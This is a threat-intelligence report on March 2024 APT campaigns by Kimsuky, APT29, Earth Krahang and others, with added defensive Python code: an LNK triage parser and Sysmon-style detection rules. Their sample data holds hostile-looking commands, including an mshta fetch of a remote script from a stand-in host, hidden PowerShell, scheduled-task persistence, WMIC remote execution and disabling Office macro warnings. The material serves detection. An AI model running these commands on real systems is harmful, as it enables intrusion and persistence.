Threat Trend Report on APT Groups – March 2024 Major Issues on APT Groups

The major APT group cases for March 2024, gathered from materials made public by security companies and institutions, are as follows.

1) Andariel

ASEC announced that the Andariel group is launching attacks using IMON Client and NetClient (Korean asset management solutions).[1] The group used self-developed malware strains such as AndarLoader, Andardoor, and ModeLoader, as well as MeshAgent (a remote control program).

2) APT29

Mandiant shared information on the WineLoader malware that the APT29 group (linked to Russia's Foreign Intelligence Service, the SVR) used to attack German political organizations.[2] This malware strain is linked to the cyber espionage activities of the SPIKEDWINE group discovered by Zscaler's ThreatLabz.[3]

The threat actor sent a PDF file disguised as an invitation to a fake wine tasting event, impersonating the ambassador of India. The PDF contained a link to a survey that redirected users to a site that infects their systems with malware. Clicking the link led to the download of a ZIP file containing an HTA file, which executes the WineLoader malware.

WineLoader was first observed in January 2024 and shares traits with other malware strains used by APT29. The malware is loaded via DLL side-loading and uses RC4 encryption for its communication with the C2 server.

3) APT33 (Curious Serpens)

Palo Alto Networks Unit 42 shared analysis of the FalseFont backdoor used by the APT33 group (also tracked as Curious Serpens and Peach Sandstorm), which is believed to have ties to Iran.[4] The group impersonated human resource management software to attack job seekers in the aerospace and defense industries.

The FalseFont backdoor supports commands such as running processes, downloading and uploading files, manipulating the file system, updating itself, stealing credentials, and capturing screenshots. It communicates with the C&C server over an encrypted channel using HTTP requests and the SignalR client.

4) Earth Krahang

Trend Micro[5] and Check Point[6] released information on Earth Krahang, which has been targeting government organizations worldwide since early 2022. The group has launched attacks against 45 countries and is expanding its targeting to the education and communications industries.

The group used various tactics, including vulnerability exploitation, spear phishing, and brute-force attacks, to gain initial access. After gaining access, the threat actor installs a VPN server and maintains persistence by registering scheduled tasks. They then use tools such as Mimikatz to dump credentials and run WMIC, along with various exploits to escalate privileges and move laterally. Earth Krahang abused compromised government infrastructure to host its malware strains and send spear-phishing emails.

The malware strains used include Cobalt Strike, RESHELL, XDealer (DinodasRAT), and Linodas, the Linux version of XDealer (DinodasRAT).

Earth Krahang has partial overlaps with Earth Lusca and the Chinese company I-Soon.

5) Evasive Panda

ESET discovered a supply chain attack by the Evasive Panda group that began in September 2023 and targeted Tibetans.[7] Watering hole attacks and trojanized Tibetan language translation software were used in the attack.

The attack targeted users who visited the website of the Tibetan Monlam festival (held in India from January to February 2024). It also involved distributing Windows and macOS installers bundled with malware through a software developer's supply chain.

The threat actor distributed malicious Windows and macOS downloaders to infect targets with the MgBot and Nightdoor malware strains.

6) Kimsuky

QianXin Threat Intelligence Center discovered a malware strain used by the Kimsuky group, disguised as a product installer for SGA, a Korean software producer.[8] The sample created a genuine installer package to deceive the user while executing the TrollAgent malware, which is packed with VMProtect. TrollAgent supports commands such as command execution, file manipulation, and system information lookup. It also creates UIDs to distinguish victims and has a self-deletion feature.

ASEC identified a case of the Kimsuky group distributing malware while impersonating a Korean public organization.[9] The attack used a dropper made to look like the installer of a certain public organization. This dropper created Endoor, a backdoor also used in past attacks with TrollAgent, in which infection occurred during the installation of security software. The dropper was signed with a valid certificate from a Korean company. It contains a password-protected compressed file and a WinRAR tool, and creates the backdoor by decompressing the file with a password. The Endoor backdoor is written in Go, can steal information from the infected system, and supports various commands. It was also used alongside Nikidoor, which was distributed via spear-phishing attacks in the past. The threat actor used the backdoor to perform malicious actions including downloading additional malware strains and exfiltrating screenshots.

The Kimsuky group was observed attempting to steal information related to the Naver Whale browser.[10] The attack began with phishing emails distributing a RAR archive containing an HTML file. When the HTML file is opened, it executes a VBScript that downloads an additional malware strain from a remote server. The threat actor used a PowerShell script to load and execute further scripts for information theft. Analysis of the attack components revealed scripts for system information collection, data encryption, transmission to a remote server, and remote code execution.

Rapid7 Labs detected cyber espionage activity by the Kimsuky group.[11] The recently observed campaign used CHM (compiled HTML help) files to deliver the malicious payload. These CHM files contain an internal HTML page, some of which execute arbitrary commands on Windows devices using ActiveX.

Securonix disclosed the DEEP#GOSU campaign, believed to be run by the North Korean group Kimsuky.[12] The attacks begin with the distribution of a malicious LNK file disguised as a PDF file. The attachment contains a PowerShell script that extracts and opens the PDF content while downloading an additional malicious payload from Dropbox. The initial payload retrieves a remote PowerShell script from Dropbox, which in turn dynamically loads and executes a .NET assembly from a different Dropbox URL. The file downloaded from Dropbox is TutClient, a remote control malware strain written in C#. It uses a PowerShell script to capture the victim's system information, including running processes, firewall status, anti-malware products, and user profile directories. The collected data is encrypted and exfiltrated to Dropbox using HTTP POST requests.

Kroll's cyber threat intelligence team identified the Kimsuky group exploiting the ScreenConnect vulnerabilities (CVE-2024-1708 and CVE-2024-1709) to infect systems with BabyShark.[13]
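The DEEP#GOSU chain above starts from an LNK file passing itself off as a PDF. The following parser is an added example written for this report and is not code from Securonix or from the original page: it reads the MS-SHLLINK ShellLinkHeader and StringData fields of a shortcut to recover the target path, arguments and window mode, then applies a few triage heuristics an analyst would check first. The sample shortcut bytes, the file name Invitation.pdf.lnk and the icon path are constructed for the demonstration, and the command they carry is a harmless placeholder.

```python
"""Minimal triage parser for Windows Shell Link (.lnk) files (added example)."""
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value: window shown minimized, never activated

# StringData entries appear in this order, each only when its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Return header fields and StringData strings of a Shell Link."""
    if len(data) < 76:
        raise ValueError("too short for a ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 60)[0]
    offset = 76
    if flags & HAS_LINK_TARGET_ID_LIST:  # uint16 size, then the ID list
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:  # first uint32 of LinkInfo is its total size
        offset += struct.unpack_from("<I", data, offset)[0]
    info = {"flags": flags, "show_command": show_command}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            info[name] = None
            continue
        count = struct.unpack_from("<H", data, offset)[0]  # CountCharacters
        offset += 2
        if flags & IS_UNICODE:
            info[name] = data[offset:offset + 2 * count].decode("utf-16-le")
            offset += 2 * count
        else:
            info[name] = data[offset:offset + count].decode("cp1252")
            offset += count
    return info


def triage(info: dict, file_name: str) -> list:
    """Return findings for a shortcut that claims to be a document."""
    findings = []
    launch = " ".join(s for s in (info["relative_path"], info["arguments"]) if s).lower()
    if file_name.lower().endswith((".pdf.lnk", ".docx.lnk", ".xlsx.lnk")):
        findings.append("double extension: shortcut named like a document")
    for host in ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript"):
        if host in launch:
            findings.append(f"target invokes script host '{host}'")
    if any(opt in launch for opt in ("-windowstyle hidden", "-w hidden", "-encodedcommand", "-enc ")):
        findings.append("arguments hide the window or carry an encoded command")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand is SW_SHOWMINNOACTIVE (window never shown)")
    return findings


def build_sample_lnk() -> bytes:
    """Constructed fixture: Unicode strings, no IDList/LinkInfo, minimized window."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20,      # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,   # creation / access / write FILETIMEs
                         0, 0,      # FileSize, IconIndex
                         SW_SHOWMINNOACTIVE,
                         0, 0, 0, 0)  # HotKey, Reserved1-3

    def ustr(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + b"".join((
        ustr(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
        ustr(r"%TEMP%"),
        ustr('-WindowStyle Hidden -Command "Write-Output constructed-sample"'),  # placeholder
        ustr(r"%ProgramFiles%\ConstructedReader\Reader.exe"),  # made-up icon path
    ))


if __name__ == "__main__":
    parsed = parse_lnk(build_sample_lnk())
    for key in ("relative_path", "working_dir", "arguments", "icon_location"):
        print(f"{key:14} {parsed[key]}")
    for finding in triage(parsed, "Invitation.pdf.lnk"):
        print("!", finding)
```

Run it on a real shortcut with `parse_lnk(open(path, "rb").read())`; the parser stops after StringData, so the optional ExtraData blocks that follow are ignored.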

The malware, executed through MSHTA, has a different hash every time it is downloaded because of heavy obfuscation. The next-stage download included three functions: configuring registry keys, exfiltrating information, and executing scheduled tasks. This malware strain modified a registry key so that untrusted macros could be executed in MS Office without alerts. The information exfiltration function collected system information, network details, and security software information.
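Several behaviours in this report are observable on the endpoint: Earth Krahang's persistence through scheduled tasks and its use of WMIC (section 4), and BabyShark's MSHTA execution and the registry change that silences Office macro warnings (above). The rules below are an added example, not code from the report or its sources, run over constructed Sysmon-style events (EventID 1 process creation and EventID 13 registry value set). The registry value name VBAWarnings and the meaning of value 1 (enable all macros without a warning) are taken from Office's own settings and are an assumption here, since the report does not name the key.

```python
"""Rule-based triage of constructed Sysmon-style events (added example)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int          # Sysmon EventID: 1 = process create, 13 = registry value set
    image: str = ""        # process image path (EventID 1)
    command_line: str = ""  # process command line (EventID 1)
    target_object: str = ""  # registry path (EventID 13)
    details: str = ""      # registry value as Sysmon renders it, e.g. "DWORD (0x00000001)"


# Assumption: Office stores macro security per application under
# ...\Software\Microsoft\Office\<version>\<app>\Security\VBAWarnings; 1 = enable all macros.
VBA_WARNINGS_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\[^\\]+\\[^\\]+\\Security\\VBAWarnings$", re.I)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_macro_warnings_disabled(ev: Event) -> bool:
    return (ev.event_id == 13
            and VBA_WARNINGS_RE.search(ev.target_object) is not None
            and ev.details.strip().lower() == "dword (0x00000001)")


def rule_scheduled_task_registered(ev: Event) -> bool:
    return (ev.event_id == 1 and image_name(ev.image) == "schtasks.exe"
            and "/create" in ev.command_line.lower())


def rule_wmic_remote_exec(ev: Event) -> bool:
    cl = ev.command_line.lower()
    return (ev.event_id == 1 and image_name(ev.image) == "wmic.exe"
            and "/node:" in cl and "process call create" in cl)


def rule_mshta_remote_script(ev: Event) -> bool:
    return (ev.event_id == 1 and image_name(ev.image) == "mshta.exe"
            and re.search(r"https?://", ev.command_line, re.I) is not None)


RULES = (
    ("office_macro_warnings_disabled", rule_macro_warnings_disabled),
    ("scheduled_task_registered", rule_scheduled_task_registered),
    ("wmic_remote_process_create", rule_wmic_remote_exec),
    ("mshta_remote_script", rule_mshta_remote_script),
)


def evaluate(events) -> list:
    """Return (event index, rule name) pairs for every rule that fires."""
    hits = []
    for idx, ev in enumerate(events):
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((idx, name))
    return hits


# Constructed sample events; host names, SIDs and URLs are made up.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(13, target_object=r"HKU\S-1-5-21-1111\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
          details="DWORD (0x00000002)"),  # 2 = disable with notification: benign
    Event(1, r"C:\Windows\System32\mshta.exe", "mshta http://constructed.example/loader.hta"),
    Event(13, target_object=r"HKU\S-1-5-21-1111\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings",
          details="DWORD (0x00000001)"),  # 1 = run all macros silently
    Event(1, r"C:\Windows\System32\schtasks.exe",
          'schtasks /Create /SC ONLOGON /TN "Updater" /TR "C:\\Users\\Public\\u.exe"'),
    Event(1, r"C:\Windows\System32\wbem\WMIC.exe",
          'wmic /node:fileserver01 process call create "cmd.exe /c hostname"'),
]

if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The benign Word event with VBAWarnings set to 2 is there on purpose: the rule keys on the value, not on the key path alone, so ordinary changes to macro notification settings do not fire it.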


[1] https://asec.ahnlab.com/en/63192/

[2] https://www.mandiant.com/resources/blog/apt29-wineloader-german-political-parties

[3] https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

[4] https://unit42.paloaltonetworks.com/curious-serpens-falsefont-backdoor/

[5] https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html

[6] https://research.checkpoint.com/2024/29676/

[7] https://www.welivesecurity.com/en/eset-research/evasive-panda-leverages-monlam-festival-target-tibetans/

[8] https://ti.qianxin.com/blog/articles/Espionage-Operation-Disguised-as-Software-Installers-by-Kimsuky-APT-Q-2-EN/

[9] https://asec.ahnlab.com/en/63396/

[10] https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247495843&idx=1&sn=7965885f6dc8503c7fc49b7002816d13

[11] https://www.rapid7.com/blog/post/2024/03/20/the-updated-apt-playbook-tales-from-the-kimsuky-threat-actor-group/

[12] https://www.securonix.com/blog/securonix-threat-research-security-advisory-new-deepgosu-attack-campaign/

[13] https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark